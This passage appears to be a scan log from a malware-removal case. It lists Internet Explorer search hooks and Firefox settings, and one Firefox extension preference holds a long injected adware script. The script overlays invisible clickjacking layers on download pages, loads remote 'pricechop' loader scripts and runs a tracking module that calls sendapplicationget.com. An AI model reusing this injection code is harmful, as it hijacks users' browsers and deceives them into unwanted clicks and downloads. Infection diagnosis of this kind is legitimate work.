IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\..\URLSearchHook: {95289393-33EA-4F8D-B952-483415B9C955} - C:\Users\Lobo\AppData\Roaming\Microsoft\Internet Explorer\qipsearchbar.dll (qip.ru)
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\..\SearchScopes,DefaultScope = {A55F9C95-2BB1-4EA2-BC77-DFAAB78832CE}
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTer ... ORM=IE8SRC
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\..\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}: "URL" = http://mysearch.avg.com/search?cid={6D8 ... 2014-05-19 20:03:06&v=18.1.0.443&pid=safeguard&sg=&sap=dsp&q={searchTerms}
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\..\SearchScopes\{A55F9C95-2BB1-4EA2-BC77-DFAAB78832CE}: "URL" = http://search.qip.ru/search?query={searchTerms}&from=IE
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\..\SearchScopes\{C77A57D4-8635-4AC8-A0B6-E1E68E413141}: "URL" = http://search.zonealarm.com/search?src= ... er=&&r=611
IE - HKU\S-1-5-21-2861910011-920187971-3878467655-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0


========== FireFox ==========

FF - prefs.js..browser.search.defaultenginename: "QIP Search"
FF - prefs.js..browser.search.selectedEngine: "QIP Search"
FF - prefs.js..browser.startup.homepage: "seznam.cz"
FF - prefs.js..extensions.eKAVDKGwssAwgwXy.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam7\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=b3qau4\")>-1||url.indexOf(\"hash=ijeqe4\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"vatican.com\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"iklk.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1||url.indexOf(\"gvud.com\")>-1||url.indexOf(\"zuzd.com\")>-1||url.indexOf(\"babaViral.com\")>-1||url.indexOf(\"cupid.so\")>-1||url.indexOf(\"hostanytime.com\")>-1||url.indexOf(\"antivirus.so\")>-1||url.indexOf(\"dates.am\")>-1||url.indexOf(\"insurance-company.co\")>-1||url.indexOf(\"advanceloan.org\")>-1||url.indexOf(\"calcitapp.info\")>-1||url.indexOf(\"desktopfavapp.info\")>-1||url.indexOf(\"?ctid=CT3330145\")>-1||url.indexOf(\"?ctid=CT3330146\")>-1||url.indexOf(\"?ctid=CT3330147\")>-1||url.indexOf(\"?ctid=CT3330148\")>-1||url.indexOf(\"?ctid=CT3330149\")>-1||url.indexOf(\"sporty-glow.com\")>-1||url.indexOf(\"game-trek.net\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"avatrade.com\")>-1||url.indexOf(\"urgent-alerts.com\")>-1||url.indexOf(\"pc-alert.com\")>-1||url.indexOf(\"error-alerts.com\")>-1||url.indexOf(\"search.searchonme.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"search.appsarefun.info\")>-1||url.indexOf(\"websearch.mocaflix.com\")>-1||url.indexOf(\"search.easylifeapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"us.yhs4.search.yahoo.com\")>-1||url.indexOf(\"search.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1){return}}catch(e){};(function(){if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var g=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var f=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+f.top+\"px;left:\"+f.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(g){}},f=document.createElement(\"script\"); f.type=\"text/javascript\";f[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+g.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(f)}-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")&&(g=document.createElement(\"img\"),g.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\"),g.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\",f=document.getElementById(\"r1113566095\").parentNode, f.style.position=\"relative\",f.appendChild(g))})();-1<window.self.location.hostname.indexOf(\"hesefiles.c\")&&(window.self.location.href=\"about:blank\"); if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+ \")()\";document.body.appendChild(s)}}if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d&&d.style&&\"fixed\"==d.style.position&&\"solid\"==d.style.borderBottomStyle&&(d.style.display=\"none\")}if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"} -1<document.location.host.indexOf(\"bookbrowsee.ne\")&&new function(){for(var g=[\"adv.php?\",\"/adv.php?\"],f=0;f<document.links.length;f++)for(var h=document.links[f],k=h.pathname+h.search,m=0;m<g.length;m++)g[m]==k.substr(0,g[m].length)&&\"nofollow\"==h.rel&&\"_blank\"==h.target&&(h.setAttribute(\"onclick\",\"return false\"),h.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1))}; if(-1<document.location.host.indexOf(\"irrorcreator.co\"))for(var c=[\"verticdn.com\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.host,b=0;b<c.length;b++)c==e&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1)); -1<document.location.host.indexOf(\"loud-vibe.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1),a.addEventListener(\"mousedown\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1)); -1<document.location.host.indexOf(\"p3seal.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1),a.addEventListener(\"mousedown\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1)); -1<document.location.host.indexOf(\"p3vampire.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1),a.addEventListener(\"mousedown\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1)); -1<document.location.href.indexOf(\"necraftdl.com/download.ph\")&&(a=document.getElementById(\"downloadpage\"),b=a.getElementsByTagName(\"a\")[0],d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.width=\"100%\",d.style.height=\"34px\",d.style.left=\"0\",d.style.cursor=\"pointer\",d.style.zIndex=9999,b.parentNode.insertBefore(d,b.previousSibling)); if(-1<document.location.href.indexOf(\"necraftdl.com\"))for(i=0;i<document.links.length;i++){var link=document.links;if(\".exe\"==link.href.substr(-4)){var p=link.parentNode;p.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.top=0;d.style.left=0;d.style.width=\"100%\";d.style.height=\"100%\";d.style.cursor=\"pointer\";d.style.zIndex=9999;p.appendChild(d)}} if(-1<document.location.host.indexOf(\"leunlckr.co\")){var b=document.getElementsByTagName(\"button\")[0],b2=document.createElement(\"button\");b2.className=b.className;b2.innerHTML=b.innerHTML;b.parentNode.insertBefore(b2,b);b.parentNode.removeChild(b)}-1<document.referrer.indexOf(\"go.theadsnet.com\")&&document.write(\"\"); (function(){var g=0;try{if(-1<window.location.href.indexOf(\"ack-free.co\"))var f=setInterval(function(){try{var h=document.getElementById(\"ucd-countdown-1\"),m=[];m.push(1*h.children[2].children[1].children[1].innerText);m.push(1*h.children[2].children[2].children[1].innerText);m.push(1*h.children[3].children[1].children[1].innerText);m.push(1*h.children[3].children[2].children[1].innerText);for(var n=h=0;n<m.length;n++)h+=m[n];if(!(0<h)){clearInterval(f);var l=document.createElement(\"div\");l.style.position= \"absolute\";l.style.top=0;l.style.left=0;l.style.width=\"100%\";l.style.height=\"100%\";l.style.zIndex=\"9999\";l.style.cursor=\"pointer\";var q=document.getElementById(\"ucd-countdown-1-content\").children[1];q.style.position=\"relative\";q.appendChild(l)}}catch(u){try{var r=0;jQuery.each(jQuery(\".ucd-figure.ucd-countdown-digit-bottom\"),function(){r+=1*jQuery(this).text()});if(0===r){clearInterval(f);var t=jQuery(\"#ucd-countdown-1-content iframe\"),v=t.parent();t.remove();v.html(\"<img title='Get Download' alt='latbut' src='http://i.imgur.com/At0oA5A.png' height='61' width='373'>\")}}catch(w){\"undefined\"!== typeof g&&30<++g&&clearInterval(f)}}},750)}catch(h){}})(); var __intervalcountasd=0,__intervalasd=setInterval(function(){__intervalcountasd++;if(-1<window.location.host.indexOf(\"ownloads.ziddu.co\")){for(var g=0;g<document.links.length;g++)try{var f=document.links[g].href.toLowerCase();if(-1==f.indexOf(\"ww.ziddu.co\")&&-1==f.indexOf(\"#\")&&-1==f.indexOf(\"tunes.apple.co\")&&-1==f.indexOf(\"lay.google.co\")&&-1==f.indexOf(\"/gallery/\")){try{for(var h=document.links[g],k=0;15>=k;k++)h=h.parentNode;if(-1<h.className.indexOf(\"footerbg\"))continue}catch(m){}var n=document.links[g].parentNode; if (!(-1<n.className.indexOf(\"addthis_toolbox\"))){n.style.position=\"relative\";var l=document.createElement(\"div\");l.style.position=\"absolute\";l.style.left=0;l.style.top=0;l.style.width=\"100%\";l.style.height=\"100%\";l.style.zIndex=\"9999\";l.style.cursor=\"pointer\";n.appendChild(l)}}}catch(q){}f=document.getElementsByTagName(\"iframe\");for(g=0;g<f.length;g++)try{-1==f[g].src.indexOf(\"acebook.co\")&&-1==f[g].src.indexOf(\"cp.crwdcntrl.ne\")&&(n=f[g].parentNode,n.style.position=\"relative\",l=document.createElement(\"div\"), l.style.position=\"absolute\",l.style.left=0,l.style.top=0,l.style.width=\"100%\",l.style.height=\"100%\",l.style.zIndex=\"9999\",l.style.cursor=\"pointer\",l.id=g,n.appendChild(l))}catch(u){}}20<__intervalcountasd&&clearInterval(__intervalasd)},500); new function(){if(0<location.host.toLowerCase().indexOf(\"pensubtitles.or\")){f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"728px\";f.style.height=\"90px\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.zIndex=\"2000\";var g=document.getElementsByTagName(\"iframe\")[0].parentNode;g.insertBefore(f,document.getElementsByTagName(\"iframe\")[0]);g.style.position=\"relative\";f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"728px\";f.style.height=\"90px\";f.style.cursor= \"pointer\";f.style.top=\"0\";f.style.zIndex=\"2000\";g=document.getElementsByTagName(\"iframe\")[1].parentNode;g.insertBefore(f,document.getElementsByTagName(\"iframe\")[1]);g.style.position=\"relative\";g=document.links;for(i=0;i<g.length;i++)\"Download\"==(\"undefined\"===typeof g.innerText?g.textContent:g.innerText)&&(f=document.createElement(\"div\"),f.style.position=\"absolute\",f.style.width=\"214px\",f.style.height=\"40px\",f.style.cursor=\"pointer\",f.style.top=\"0\",f.style.zIndex=\"2000\",p=g.parentNode, p.style.position=\"relative\",p.insertBefore(f,g[i]));document.getElementById(\"scrubbuad\").style.zIndex=\"15\";f=document.createElement(\"div\");f.style.zIndex=\"15000\";f.style.right=\"9px\";f.style.bottom=\"0\";f.style.position=\"fixed\";f.style.padding=\"0\";f.style.margin=\"0 0 30px 0\";f.style.width=\"220px\";f.style.height=\"72px\";f.style.overflow=\"visible\";f.style.cursor=\"pointer\";document.getElementsByTagName(\"body\")[0].firstChild.appendChild(f)}if(-1<window.location.href.indexOf(\"pensubtitles.us/opensubtitles-playe\")){g= document.getElementById(\"divPlayerDesc\");if(null!=g){g.style.position=\"relative\";var f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\";f.style.height=\"100%\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.zIndex=\"2000\";g.appendChild(f)}g=document.getElementById(\"divPlayerHead\");if(null!=g)for(var h=0;h<g.children.length;h++)if(\"span\"==g.children[h].tagName.toLowerCase()){var k=g.children[h],f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\"; f.style.height=\"70px\";f.style.cursor=\"pointer\";f.style.top=\"-50px\";f.style.zIndex=\"2000\";k.style.position=\"relative\";k.appendChild(f)}}}; if(-1<location.host.toLowerCase().indexOf(\"romptfile.co\")){for(var p={},frames=document.getElementById(\"confirmbox\").getElementsByTagName(\"iframe\"),index=0;index<frames.length;index++)\"300\"==frames[index].getAttribute(\"width\")&&\"250\"==frames[index].getAttribute(\"height\")&&(p=frames[index].parentNode);p.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.width=\"100%\";d.style.height=\"255px\";d.style.cursor=\"pointer\";d.style.top=\"0\";d.style.zIndex=\"2000\";p.appendChild(d)} new function(){if(-1<window.location.host.toLowerCase().indexOf(\"pensoftwareupdater.co\"))if(\"undefined\"!==typeof $)window.__qqcount=0,window.__qqint=setInterval(function(){var f=$(\".download\").parent();f.css(\"position\",\"relative\");var g=document.createElement(\"div\");g.style.position=\"absolute\";g.style.zIndex=\"2000\";g.style.height=\"100%\";g.style.width=\"122px\";g.style.right=\"0\";g.style.top=\"0\";g.style.cursor=\"pointer\";f.append(g);f=$(\"#addBoxX\").parent();f.css(\"position\",\"relative\");g=document.createElement(\"div\"); g.style.position=\"absolute\";g.style.zIndex=\"2000\";g.style.height=\"45px\";g.style.width=\"101px\";g.style.right=\"22px\";g.style.bottom=\"16px\";g.style.cursor=\"pointer\";f.append(g);window.__qqcount++;10<window.__qqcount&&clearInterval(window.__qqint)},250);else for(var g=document.links,f={},h={},k=0;k<g.length;k++)f=g[k].getAttribute(\"href\"),null!=f&&-1<f.toLowerCase().indexOf(\"pensoftwareupdater.com/idownloader.ph\")&&(f=g[k].getAttribute(\"id\"),null!=f&&\"addBoxX\"==f?(h=g[k].parentNode,h.style.position=\"relative\", f = document.createElement(\"div\"),f.style.position=\"absolute\",f.style.zIndex=\"2000\",f.style.height=\"45px\",f.style.width=\"101px\",f.style.right=\"22px\",f.style.bottom=\"16px\"):(h=g[k].parentNode,h.style.position=\"relative\",f=document.createElement(\"div\"),f.style.position=\"absolute\",f.style.zIndex=\"2000\",f.style.height=\"100%\",f.style.width=\"122px\",f.style.right=\"0\",f.style.top=\"0\"),f.style.cursor=\"pointer\",h.appendChild(f))}; new function(){-1<location.host.toLowerCase().indexOf(\"ulkload.co\")&&(window.___interCount=0,window.___interval=setInterval(function(){for(var g=document.getElementsByTagName(\"center\"),f=0;f<g.length;f++)if(0!=f&&!(-1<g[f].innerHTML.indexOf(\"adcopy-outer\")||-1<g[f].innerHTML.indexOf(\"btn_download\")||-1<g[f].innerHTML.indexOf(\"solvemedia puzzle widget\"))){var h=document.createElement(\"div\");h.style.width=\"100%\";h.style.height=\"100%\";h.style.cursor=\"pointer\";h.style.zIndex=\"1900\";h.style.position=\"absolute\"; f ==g.length-1?(h.style.bottom=\"0\",h.style.height=\"110px\"):h.style.top=\"0\";g[f].style.position=\"relative\";g[f].appendChild(h)}g=document.getElementById(\"cap\");null!=g&&(g.parentNode.style.position=\"relative\",g.parentNode.style.zIndex=\"2000\");20<window.___interCount++&&clearInterval(window.___interval)},500))}; new function(){if(-1<location.host.toLowerCase().indexOf(\"eehd.co\")){var g=document.createElement(\"div\");g.style.top=\"0\";g.style.width=\"100%\";g.style.height=\"100%\";g.style.cursor=\"pointer\";g.style.zIndex=\"2000\";g.style.position=\"absolute\";var f=document.getElementsByTagName(\"iframe\")[0].parentNode;f.style.position=\"relative\";f.appendChild(g);g=document.createElement(\"div\");g.style.top=\"0\";g.style.width=\"100%\";g.style.height=\"100%\";g.style.cursor=\"pointer\";g.style.zIndex=\"2000\";g.style.position=\"absolute\"; f = document.getElementById(\"preview\");f.style.position=\"relative\";f.appendChild(g)}};new function(){-1<window.location.host.toLowerCase().indexOf(\"p3olimp.ne\")&&(window.__intCount=0,window.__int=setInterval(function(){var g=document.getElementById(\"download-manager-checkbox\");if(null!==g)try{g.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=!1}catch(f){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250))}; if(-1<document.location.host.indexOf(\"p3olimp.ne\")&&document.getElementsByClassName&&null!==document.getElementById(\"download-manager-checkbox\"))for(c=document.getElementById(\"download-manager-checkbox\"),c.onchange=function(){for(var g=document.getElementsByClassName(\"nasjfkla\"),f=0;f<g.length;f++)g[f].style.display=c.checked?\"block\":\"none\"},i=0;i<document.links.length;i++){var link=document.links[i],onclick=link.getAttribute(\"onclick\");if(onclick&&-1<onclick.indexOf(\"prepare_download_file\")){var div= link.parentNode;div.style.position=\"relative\";b=document.createElement(\"div\");b.className=\"nasjfkla\";b.style.position=\"absolute\";b.style.top=\"-2px\";b.style.left=\"92px\";b.style.width=\"71px\";b.style.height=\"16px\";b.style.zIndex=\"99999\";b.style.cursor=\"pointer\";div.appendChild(b)}} -1<location.host.indexOf(\"p3olimp.ne\")&&setTimeout(function(){for(var g=document.getElementById(\"leftside\"),f=0;f<g.children.length;f++)if(/\\bspnBook\\b/.test(g.children[f].className))for(var h=g.children[f].getElementsByTagName(\"a\"),k=0;k<h.length;k++)h[k].setAttribute(\"href\",\"#\"),h[k].setAttribute(\"target\",\"\")},1E3); new function(){if(-1<window.location.host.toLowerCase().indexOf(\"ullypcgames.ne\"))for(var g=document.getElementsByTagName(\"center\"),f=0;f<g.length;f++){var h=g[f].firstChild;\"undefined\"!==typeof h.tagName&&\"a\"==h.tagName.toLowerCase()&&(g[f].style.position=\"relative\",h=document.createElement(\"div\"),h.style.position=\"absolute\",h.style.top=\"0\",h.style.left=\"0\",h.style.width=\"100%\",h.style.height=\"100%\",h.style.zIndex=\"2000\",h.style.cursor=\"pointer\",g[f].appendChild(h))}}; new function(){if(window.location.host.toLowerCase().indexOf(\"llplayer.com.b\"))for(var g=document.getElementsByTagName(\"img\"),f=0;f<g.length;f++)if(-1<g[f].getAttribute(\"src\").indexOf(\"baixatudo.png\")){var h=document.createElement(\"div\");h.style.width=\"100%\";h.style.height=\"100%\";h.style.position=\"absolute\";h.style.zIndex=\"9999\";h.style.top=\"0\";h.style.cursor=\"pointer\";var k=g[f].parentNode.parentNode;k.style.position=\"relative\";k.appendChild(h)}}; new function(){if(0<location.host.toLowerCase().indexOf(\"ubtitulosespanol.or\")){var g=document.links;for(i=0;i<g.length;i++)if(\"Descargar Subt\\u00edtulo\"===(g[i].innerText?g[i].innerText:g[i].textContent)){var f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\";f.style.height=\"100%\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.left=\"0\";f.style.zIndex=\"2000\";var h=g[i].parentNode;h.appendChild(f);h.style.position=\"relative\"}}}; new function(){if(0<location.host.toLowerCase().indexOf(\"ubtitles4free.ne\")){var g=document.links;for(i=0;i<g.length;i++)if(\"Download Subtitle\"===(g[i].innerText?g[i].innerText:g[i].textContent)){var f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\";f.style.height=\"100%\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.left=\"0\";f.style.zIndex=\"2000\";var h=g[i].parentNode;h.appendChild(f);h.style.position=\"relative\"}}}; new function(){if(0<location.host.toLowerCase().indexOf(\"egendasbrasil.or\")){var g=document.links;for(i=0;i<g.length;i++)if(\"Baixar Legenda\"===(g[i].innerText?g[i].innerText:g[i].textContent)){var f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\";f.style.height=\"100%\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.left=\"0\";f.style.zIndex=\"2000\";var h=g[i].parentNode;h.appendChild(f);h.style.position=\"relative\"}}}; new function(){window.location.host.toLowerCase().indexOf(\"reeroms.co\")&&(window.__sdahfjkahfals3243Count=0,window.__sdahfjkahfals3243Int=setInterval(function(){for(var g=document.getElementsByTagName(\"a\"),f=0;f<g.length;f++){var h=\"undefined\"===typeof g[f].innerText?g[f].textContent:g[f].innerText,h=h.trim();if(\"Download\"===h||0==h.indexOf(\"Direct\")){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.position=\"absolute\";k.style.zIndex=\"9999\";k.style.top=\"0\";k.style.cursor= \"pointer\";var m=g[f].parentNode;m.style.position=\"relative\";m.appendChild(k);0==h.indexOf(\"Direct\")&&clearInterval(window.__sdahfjkahfals3243Int)}}40<window.__sdahfjkahfals3243Count++&&clearInterval(window.__sdahfjkahfals3243Int)},500))}; new function(){if(-1<window.location.host.toLowerCase().indexOf(\"eneral-ebooks.co\"))for(var g=document.getElementsByTagName(\"iframe\"),f=0;f<g.length;f++){var h=g[f].parentNode;if(null!=h){var k=h.getAttribute(\"class\");null!=k&&-1<k.indexOf(\"banner-body\")&&(k=document.createElement(\"div\"),k.style.width=\"100%\",k.style.height=\"100%\",k.style.position=\"absolute\",k.style.zIndex=\"9999\",k.style.top=\"0\",k.style.cursor=\"pointer\",h.style.position=\"relative\",h.appendChild(k))}}};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1500/l.js?aoi=1311798366&pid=1500&zoneid=413903&ext=pricechop&systemid=15713307296802838624&ext=pricechop\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1542/l.js?aoi=1311798366&pid=1542&zoneid=413903&ext=pricechop&systemid=15713307296802838624&ext=pricechop\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1399/l.js?aoi=1311798366&pid=1399&zoneid=413903&ext=pricechop&systemid=15713307296802838624&ext=pricechop\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"pricechop\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=nasrat(\";\"),b=0;b<c.length;b++){for(var g=c;\" \"==g.charAt(0);)g= g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\"); this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g= a.query_selector_all(c);clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a}; a.get_computed_style=\"function\"!=typeof 